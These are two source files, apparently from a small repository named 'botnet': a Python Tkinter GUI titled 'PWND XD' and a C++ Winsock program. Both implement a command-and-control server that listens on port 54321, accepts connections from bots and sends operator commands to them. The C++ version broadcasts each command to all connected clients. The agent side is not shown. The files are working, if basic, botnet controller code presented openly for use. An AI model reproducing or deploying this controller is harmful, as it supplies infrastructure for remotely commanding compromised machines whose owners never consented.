File: botnet/run_botnet.py
import sys
import threading
import socket
import tkinter as tk
from tkinter.scrolledtext import ScrolledText

class BotnetGUI:
    def __init__(self, root):
        self.root = root
        self.root.title("PWND XD")

        self.output_area = ScrolledText(root, wrap=tk.WORD, height=20, width=80)
        self.output_area.pack(padx=10, pady=10)

        self.command_entry = tk.Entry(root, width=80)
        self.command_entry.pack(padx=10, pady=10)
        self.command_entry.bind("<Return>", self.send_command)

        self.client_socket = None
        self.clients = {}
        self.start_server()

    def start_server(self):
        threading.Thread(target=self.connect_to_server, daemon=True).start()

    def connect_to_server(self):
        HOST = '0.0.0.0'
        PORT = 54321

        server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server_socket.bind((HOST, PORT))
        server_socket.listen(5)
        self.append_output(f"[*] Listening on {HOST}:{PORT}")

        while True:
            client_socket, addr = server_socket.accept()
            #prevent multiple connections
            if addr not in self.clients:
                self.clients[addr] = client_socket
                self.client_socket = client_socket
                self.append_output(f"[*] Accepted connection from {addr}")
                threading.Thread(target=self.handle_client, args=(client_socket, addr), daemon=True).start()
            else:
                client_socket.close()

    def handle_client(self, client_socket, addr):
        while True:
            try:
                response = client_socket.recv(4096).decode('utf-8')
                if response:
                    self.append_output(response)
            except Exception as e:
                self.append_output(f"Connection error with {addr}: {e}")
                client_socket.close()
                if addr in self.clients:
                    del self.clients[addr]
                break

    def send_command(self, event=None):
        command = self.command_entry.get()
        if self.client_socket and command:
            try:
                self.client_socket.sendall(command.encode('utf-8'))
                self.append_output(f"> {command}")
            except Exception as e:
                self.append_output(f"Failed to send command: {e}")
                self.client_socket = None #reset on failure
            self.command_entry.delete(0, tk.END)

    def append_output(self, message):
        self.output_area.insert(tk.END, message + "\n")
        self.output_area.yview(tk.END)

def run_gui():
    root = tk.Tk()
    gui = BotnetGUI(root)
    root.mainloop()

if __name__ == "__main__":
    run_gui()

File: botnet/run_botnet.cpp
#include <iostream>
#include <winsock2.h>
#include <thread>
#include <map>
#include <vector>

#pragma comment(lib, "ws2_32.lib")

#define INET_ADDRSTRLEN 16  // Manually define INET_ADDRSTRLEN

const int SERVER_PORT = 54321;
std::map<std::string, SOCKET> clients;

void handle_client(SOCKET client_socket, std::string client_id) {
    char buffer[4096];
    while (true) {
        int bytesReceived = recv(client_socket, buffer, sizeof(buffer) - 1, 0);
        if (bytesReceived <= 0) {
            std::cerr << "[*] Connection lost with " << client_id << std::endl;
            closesocket(client_socket);
            clients.erase(client_id);
            break;
        }
        buffer[bytesReceived] = '\0';
        std::cout << "[" << client_id << "] " << buffer << std::endl;
    }
}

void start_server() {
    WSADATA wsaData;
    WSAStartup(MAKEWORD(2, 2), &wsaData);
    SOCKET server_socket = socket(AF_INET, SOCK_STREAM, 0);

    sockaddr_in server_addr;
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(SERVER_PORT);
    server_addr.sin_addr.s_addr = INADDR_ANY;

    bind(server_socket, (sockaddr*)&server_addr, sizeof(server_addr));
    listen(server_socket, 5);

    std::cout << "[*] Listening on port " << SERVER_PORT << std::endl;

    while (true) {
        sockaddr_in client_addr;
        int client_addr_len = sizeof(client_addr);
        SOCKET client_socket = accept(server_socket, (sockaddr*)&client_addr, &client_addr_len);

        char *client_ip = inet_ntoa(client_addr.sin_addr);  // Use inet_ntoa for IP conversion
        std::string client_id = std::string(client_ip) + ":" + std::to_string(ntohs(client_addr.sin_port));

        std::cout << "[*] Accepted connection from " << client_id << std::endl;
        clients[client_id] = client_socket;
        std::thread(handle_client, client_socket, client_id).detach();
    }

    closesocket(server_socket);
    WSACleanup();
}

void send_command() {
    std::string command;
    while (true) {
        std::cout << "> ";
        std::getline(std::cin, command);
        for (const auto &pair : clients) {
            send(pair.second, command.c_str(), command.size(), 0);
        }
    }
}

int main() {
    std::thread server_thread(start_server);
    send_command();
    server_thread.join();
    return 0;
}
